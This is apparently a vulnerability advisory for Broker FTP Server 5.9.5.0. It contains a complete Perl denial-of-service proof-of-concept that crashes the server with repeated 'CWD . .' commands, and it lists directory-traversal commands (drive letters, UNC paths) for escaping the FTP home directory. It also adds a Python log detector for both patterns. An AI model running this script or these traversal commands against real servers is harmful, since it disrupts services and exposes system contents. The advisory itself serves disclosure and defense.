COMMAND

    Broker FTP Server

SYSTEMS AFFECTED

    Broker FTP Server 5.9.5.0

PROBLEM

    ByteRage found the following.

    1) Buffer Overflow / DoS
    ========================
    The DoS, which completely freezes the victim machine, can be
    triggered by repeatedly sending the following command (after
    logging in):

       CWD . .
       (CD ". ." with an FTP client)

    or, even more effectively, by adding more spaces between the dots:

        CWD .                                                          .

    The server seems to regard these "directories" as valid and appends
    them to the current path, causing a DoS once a certain bound has
    been reached (the last form has to be repeated about 30 times or so).

    Below is the script brokerdos.pl which automates this:

    #!/usr/bin/perl
    
    # Broker FTP Server 5.9.5.0 DoS proof of concept
    #
    # Syntax : perl brokerdos.pl <host> <port> <loginid> <loginpwd>
    # Impact : eventually causes an access violation in the TSFTPSRV process
    #          the buffer overflow might be exploitable and be used to gain access
    #          to the FTP Server hostcomputer.
    #
    # by [ByteRage] <byterage@yahoo.com>
    # www.byterage.cjb.net (http://elf.box.sk/byterage/)
    
    use strict;
    use warnings;
    use IO::Socket;
    
    # command-line arguments, defaulting to an anonymous login on localhost
    my $host     = $ARGV[0] || "127.0.0.1";
    my $port     = $ARGV[1] || "21";
    my $loginid  = $ARGV[2] || "anonymous";
    my $loginpwd = $ARGV[3] || "anonymous";
    print "Logging on @ $host:$port\n\n";
    
    my $SOCK = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => $port)
        or die "Couldn't create socket !";
    $SOCK->autoflush();
    
    # get daemon banner
    my $reply = "";
    sysread($SOCK, $reply, 2000);
    print $reply;
    # login
    syswrite $SOCK, "USER $loginid\015\012";
    sysread($SOCK, $reply, 2000);
    print $reply;
    syswrite $SOCK, "PASS $loginpwd\015\012";
    sysread($SOCK, $reply, 2000);
    print $reply;
    # read again in case the login reply arrives separately
    sysread($SOCK, $reply, 2000);
    print "$reply\nSending crash [";
    
    if (substr($reply, 0, 1) eq '2') {
      # Login successful: send "CWD . <spaces> ." once a second until the
      # socket write fails, which is taken to mean the server went down
      my $i = 1;
      while ($i) {
        $i = syswrite $SOCK, "CWD .                                                                             .\015\012";
        print ".";
        sleep(1);
      }
      print "]\nSocket write failed... possible cause : Host down :(\n";
    }
    close($SOCK);
    exit();

    ByteRage has once been able to make Broker FTP Server crash this
    way with EIP set to something like "  .\" (and SoftIce popped up),
    so this buffer overflow might be exploitable; it has not been
    possible to reproduce this situation afterwards though. Also, the
    file at C:\Program Files\TransSoft Ltd\Broker 5\Data\Errors.log
    reported access violations at offsets that were definitely taken
    from the input string (like 20202020, 2020202E etc.).

    2) Directory Traversal
    ======================
    You can map out the contents of every drive available to the system
    in the following manner (you don't seem to be able to upload or
    download files though).

    To go out of the home directory, type the following in your FTP
    client:

        CD C: or CD C:\

    (You can also go to the A: drive with CD A:, or to CD-ROM and
    network drives.) Now you can list the contents of the drive with
    the FTP client:

        LS

    And dive into subdirs with something like:

        CD C:\WINDOWS\

    etc. Although you can map every drive, you don't seem to be able to
    send/receive files. It is also possible to escape the home
    directory using UNC pathnames (starting with \\), which might be
    used to remotely access local shares.
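    Both findings above leave a recognisable trace in the server's command
    log: a burst of CWD commands whose argument is only dots and spaces
    (section 1), and CWD commands naming a drive letter or a UNC path
    (section 2). The following detector is an added example for this
    advisory, not code from the advisory or from ByteRage; the log layout
    it parses (date, time, client IP, user, command text) and the sample
    lines are constructed assumptions, not Broker FTP Server's own format.

```python
import re
from collections import defaultdict

# Constructed sample of a server-side FTP command log; the layout
# (date time client_ip user command [argument]) is hypothetical, not Broker's.
SAMPLE_LOG = """\
2001-03-05 10:42:11 192.0.2.10 alice CWD pub
2001-03-05 10:42:12 192.0.2.10 alice LIST
2001-03-05 10:43:01 198.51.100.7 anonymous CWD . .
2001-03-05 10:43:02 198.51.100.7 anonymous CWD .        .
2001-03-05 10:43:03 198.51.100.7 anonymous CWD . .
2001-03-05 10:44:00 203.0.113.9 bob CWD C:\\
2001-03-05 10:44:05 203.0.113.9 bob CWD \\\\fileserver\\share
"""

# CWD whose argument is dots separated by whitespace (". .", ".   .");
# a plain "CWD .." (parent directory) is normal FTP usage and is not matched.
DOT_SEQUENCE_CWD = re.compile(r"^CWD\s+\.(?:\s+\.)+\s*$", re.IGNORECASE)
# CWD to a drive letter ("C:", "C:\") or a UNC path ("\\server\share"),
# both of which leave the configured home directory.
DRIVE_OR_UNC_CWD = re.compile(r"^CWD\s+(?:[A-Za-z]:|\\\\)", re.IGNORECASE)


def classify_command(cmd_text):
    """Return the suspicious-pattern name for one FTP command, or None."""
    if DOT_SEQUENCE_CWD.match(cmd_text):
        return "cwd_dot_sequence"
    if DRIVE_OR_UNC_CWD.match(cmd_text):
        return "cwd_drive_or_unc"
    return None


def analyze_log(text, dot_threshold=30):
    """Return (client_ip, user, pattern, detail) alerts found in the log text."""
    dot_counts = defaultdict(int)
    alerts = []
    for line in text.splitlines():
        parts = line.split(None, 4)  # keep the spaces inside the command text
        if len(parts) < 5:
            continue
        _date, _time, client_ip, user, cmd_text = parts
        kind = classify_command(cmd_text)
        if kind == "cwd_drive_or_unc":
            # every departure from the home directory is worth a record
            alerts.append((client_ip, user, kind, cmd_text))
        elif kind == "cwd_dot_sequence":
            # count per session owner; the advisory saw the freeze after ~30
            dot_counts[(client_ip, user)] += 1
            if dot_counts[(client_ip, user)] == dot_threshold:
                alerts.append((client_ip, user, kind, f"{dot_threshold} dot-sequence CWDs"))
    return alerts
```

    The default threshold of 30 mirrors the repetition count reported
    above; lower it (e.g. `analyze_log(SAMPLE_LOG, dot_threshold=3)`) to
    flag the pattern early, before the server reaches the bound.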

SOLUTION

    Nothing yet.